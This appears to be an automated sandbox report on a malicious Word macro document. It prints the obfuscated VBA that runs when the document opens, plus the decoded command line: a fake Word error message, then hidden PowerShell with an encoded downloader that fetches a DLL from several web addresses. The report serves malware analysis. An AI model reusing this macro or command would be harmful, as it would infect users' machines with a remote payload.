Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rlKxF
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: VVDiBADws
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TziQbRH
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Replace
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: He0e1df114_gsl7i
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: rwAdJC
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: buaHCHyIN
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: HzpNhFB
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SdueDATuJ
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: TQutDNlhF
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: wAZjcaDbE
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Array
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: SOBiDVBG
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Target
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: Split
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: LXmiCH
Part of subcall function Sotm_c8dqxel@Gp0t5ucwnkng7fi: uQDVbE
Array
gPxXF
Target
Split
IcBqyoTE
vMqQFsCmr
Array
huzCVaAnM
Target
Split
AEpDpJGH
nmoAspl

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
117	Function Zr9iedzfw6nr(Pdkbu8b4a_ucmmy2)
118	On Error Resume Next	executed
119	Goto XDCYoHErU
120	Const OtpOArK as String = "A"
121	Const mbLvUI as String = ","
122	Const iJkmJG as String = "high,critic"
123	Dim uHhldyVW as Range
123	Set uHhldyVW = Array((OtpOArK), Target)	Array OtpOArK Target
124	If uHhldyVW Is Nothing Then
125	Endif
126	Dim OAFQFBEFa() as String
126	OAFQFBEFa = Split(iJkmJG, mbLvUI)	Split iJkmJG mbLvUI
126	XDCYoHErU:
128	N21io7rxzal10t = Pdkbu8b4a_ucmmy2
129	Goto PDgjIDCIF
130	Const vQbVHTJ as String = "A"
131	Const SRadpEcF as String = ","
132	Const mbdQXnNAJ as String = "high,critic"
133	Dim ZhuxR as Range
133	Set ZhuxR = Array((vQbVHTJ), Target)	Array vQbVHTJ Target
134	If ZhuxR Is Nothing Then
135	Endif
136	Dim xcFaA() as String
136	xcFaA = Split(mbdQXnNAJ, SRadpEcF)	Split mbdQXnNAJ SRadpEcF
136	PDgjIDCIF:
138	L4jc0swehya = Sotm_c8dqxel(N21io7rxzal10t)
139	Goto zPYsAGBC
140	Const gPxXF as String = "A"
141	Const vMqQFsCmr as String = ","
142	Const IcBqyoTE as String = "high,critic"
143	Dim UTUqCwyI as Range
143	Set UTUqCwyI = Array((gPxXF), Target)	Array gPxXF Target
144	If UTUqCwyI Is Nothing Then
145	Endif
146	Dim MNzdmO() as String
146	MNzdmO = Split(IcBqyoTE, vMqQFsCmr)	Split IcBqyoTE vMqQFsCmr
146	zPYsAGBC:
148	Zr9iedzfw6nr = L4jc0swehya
149	Goto mFRDA
150	Const huzCVaAnM as String = "A"
151	Const nmoAspl as String = ","
152	Const AEpDpJGH as String = "high,critic"
153	Dim EZSQT as Range
153	Set EZSQT = Array((huzCVaAnM), Target)	Array huzCVaAnM Target
154	If EZSQT Is Nothing Then
155	Endif
156	Dim aEMwHJJ() as String
156	aEMwHJJ = Split(AEpDpJGH, nmoAspl)	Split AEpDpJGH nmoAspl
156	mFRDA:
158	End Function

Function Sotm_c8dqxel, APIs: 38, Strings: 19, Number of lines: 69, Relevance: 105.069

APIs	Meta Information
Array
UrnhFG
Target
Split
LYEtDJDB
AeZXCL
Array
bTSPCh
Target
Split
XfKDE
eJIkEagfC
Array
rlKxF
Target
Split
VVDiBADws
TziQbRH
Replace	Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process Replace("ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu db n,"ns wu db nd",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArACcAbgBkADoALwAnACkAKwAnAC8AJwArACgAJwBlAC0AJwArACcAdwAnACsAJwBkAGUAcwBpAGcAbgAnACkAKwAnAC4AJwArACgAJwBlACcAKwAnAHUALwB3AHAAJwApACsAJwAtACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG4AdABlACcAKQArACgAJwBuAHQAJwArACcALwAnACsAJwBiAG4AMQBJAGcAJwArACcARAAnACsAJwBlAGoAaAAvACEAbgBzACAAJwApACsAKAAnAHcAdQAnACsAJwAgAGQAJwArACcAYgAgAG4AZAAnACkAKwAnADoALwAnACsAJwAvACcAKwAnAHQAJwArACgAJwByAGEAJwArACcAdQBtAGYAJwApACsAJwByACcAKwAnAGEAJwArACgAJwB1AGUAJwArACcAbgAnACkAKwAoACcALQB1AGsAJwArACcAcgAnACkAKwAoACcAYQBpACcAKwAnAG4AZQAnACsAJwAuAGQAZQAnACkAKwAnAC8AYgAnACsAKAAnAGkAbgAnACsAJwAvAEoAeQBlACcAKQArACgAJwBTAC8AIQAnACsAJwBuAHMAIAB3AHUAIAAnACkAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AJwArACcAZABzADoAJwApACsAKAAnAC8ALwAnACsAJwBqAGYAbABtACcAKQArACgAJwBrAHQAJwArACcAZwAuAHcAcABjACcAKQArACcAbwBtACcAKwAoACcAcwB0AGEAJwArACcAZwBpACcAKwAnAG4AZwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAnACkAKwAoACcALwBBAEsAJwArACcALwAnACkAKwAoACcAIQBuAHMAJwArACcAIAB3AHUAIAAnACkAKwAoACcAZABiACAAJwArACcAbgBkACcAKQArACgAJwBzADoAJwArACcALwAvAGwAaQBuACcAKQArACcAaABrACcAKwAoACcAaQAn
He0e1df114_gsl7i
Array
rwAdJC
Target
Split
buaHCHyIN
HzpNhFB
Array
SdueDATuJ
Target
Split
TQutDNlhF
wAZjcaDbE
Array
SOBiDVBG
Target
Split
LXmiCH
uQDVbE

Strings	Decrypted Strings
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"
"ns w""u db nd"
"A"
","
"high,critic"
"A"
","
"high,critic"
"A"
","
"high,critic"

Line	Instruction	Meta Information
159	Function Sotm_c8dqxel(Tw8vu7dybjhd)
160	Goto eRlxboGG	executed
161	Const UrnhFG as String = "A"
162	Const AeZXCL as String = ","
163	Const LYEtDJDB as String = "high,critic"
164	Dim MvCNCxeRC as Range
164	Set MvCNCxeRC = Array((UrnhFG), Target)	Array UrnhFG Target
165	If MvCNCxeRC Is Nothing Then
166	Endif
167	Dim jqLUKf() as String
167	jqLUKf = Split(LYEtDJDB, AeZXCL)	Split LYEtDJDB AeZXCL
167	eRlxboGG:
169	Goto DJesE
170	Const bTSPCh as String = "A"
171	Const eJIkEagfC as String = ","
172	Const XfKDE as String = "high,critic"
173	Dim eFfcEAI as Range
173	Set eFfcEAI = Array((bTSPCh), Target)	Array bTSPCh Target
174	If eFfcEAI Is Nothing Then
175	Endif
176	Dim jKGrEhAE() as String
176	jKGrEhAE = Split(XfKDE, eJIkEagfC)	Split XfKDE eJIkEagfC
176	DJesE:
178	Goto xdoxB
179	Const rlKxF as String = "A"
180	Const TziQbRH as String = ","
181	Const VVDiBADws as String = "high,critic"
182	Dim nQutDRr as Range
182	Set nQutDRr = Array((rlKxF), Target)	Array rlKxF Target
183	If nQutDRr Is Nothing Then
184	Endif
185	Dim rQMlbCDj() as String
185	rQMlbCDj = Split(VVDiBADws, TziQbRH)	Split VVDiBADws TziQbRH
185	xdoxB:
187	Sotm_c8dqxel = Replace(Tw8vu7dybjhd, "ns w" + "u db nd", He0e1df114_gsl7i)	Replace("wns wu db ndinns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db ndns wu db ndns wu db ndsns wu db ndns wu db ndns wu db nd:wns wu db ndns wu db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db ndns wu db ndpns wu db ndns wu db ndrons wu db ndns wu db ndcens wu db ndsns wu db ndsns wu db ndns wu db nd","ns wu db nd",) -> winmgmts:win32_process He0e1df114_gsl7i executed
188	Goto VZXgAzj
189	Const rwAdJC as String = "A"
190	Const HzpNhFB as String = ","
191	Const buaHCHyIN as String = "high,critic"
192	Dim KJKIF as Range
192	Set KJKIF = Array((rwAdJC), Target)	Array rwAdJC Target
193	If KJKIF Is Nothing Then
194	Endif
195	Dim xMeNBMA() as String
195	xMeNBMA = Split(buaHCHyIN, HzpNhFB)	Split buaHCHyIN HzpNhFB
195	VZXgAzj:
197	Goto XxDunFI
198	Const SdueDATuJ as String = "A"
199	Const wAZjcaDbE as String = ","
200	Const TQutDNlhF as String = "high,critic"
201	Dim ZtlVi as Range
201	Set ZtlVi = Array((SdueDATuJ), Target)	Array SdueDATuJ Target
202	If ZtlVi Is Nothing Then
203	Endif
204	Dim yVlwI() as String
204	yVlwI = Split(TQutDNlhF, wAZjcaDbE)	Split TQutDNlhF wAZjcaDbE
204	XxDunFI:
206	Goto cCNkM
207	Const SOBiDVBG as String = "A"
208	Const uQDVbE as String = ","
209	Const LXmiCH as String = "high,critic"
210	Dim zgEErH as Range
210	Set zgEErH = Array((SOBiDVBG), Target)	Array SOBiDVBG Target
211	If zgEErH Is Nothing Then
212	Endif
213	Dim KDRcGw() as String
213	KDRcGw = Split(LXmiCH, uQDVbE)	Split LXmiCH uQDVbE
213	cCNkM:
215	End Function

Module: Ht_h_pv5qq7taeoe3a

Declaration

Line	Content
1	Attribute VB_Name = "Ht_h_pv5qq7taeoe3a"

Module: U765y5vgf_ao0faq

Declaration

Line	Content
1	Attribute VB_Name = "U765y5vgf_ao0faq"
2	Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 78, Strings: 0, Number of lines: 3, Relevance: 118.503

APIs	Meta Information
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AjzpdH
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: yqmFHJvF
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jbkkjHHCd
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Nkemmqfhxex
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Content
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Dt5ebejo9lypr_3vmp
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wPuUI
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TfZstIBWb
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QNBiBDJF
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: mQUInscCB
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: NxyDdD
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: PmHbFtBA
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ZcbWFy
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uwcdCFcFJ
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: jmprxcAGG
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: upIoDlhH
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DpdIEHHc
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BZLGJ
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Name
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Application
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: LFmsHlGJO
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: DReLBGD
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: VlJBAxsF
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: QttEc
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ybkwIF
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: sInuFuLII
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: JNPIBwzJy
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: MtSXGFAwF
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: xJhvfW
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: GetObject
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: vXvXQH
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: AnoeDGEY
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: BBnudDV
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Mid
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Len
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: TYMfJE
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: zzXfBb
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: ppqanE
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Create
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: S2xsub800b7
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Tl85j6j2gy2n7qad
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Array
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: uFHXMGsDH
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Target
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: Split
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: UupSwG
Part of subcall function Xusmagx95iuck_o3o@Gp0t5ucwnkng7fi: wbcoCJA

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Xusmagx95iuck_o3o	executed
11	End Sub

Reset < >

Analysis Process: powershell.exe PID: 2280 Parent PID: 1428 powershell.exeCOMMON

Executed Functions

Function 000007FF00270789, Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2339103107.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cddaffcbc750a86d2eeef56f4669b3a31c02b8f7023f59d9a587ad860832e4f6
Instruction ID: af9f3c0678e1c035a5d487992322d9a9152b43256c6d51c978e82742425ce00a
Opcode Fuzzy Hash: cddaffcbc750a86d2eeef56f4669b3a31c02b8f7023f59d9a587ad860832e4f6
Instruction Fuzzy Hash: 18615B2154EBC68FD753577868696A17FF0AF57210B0A01E7D088CF0B3D95C4D9AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF002726A1, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2339103107.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
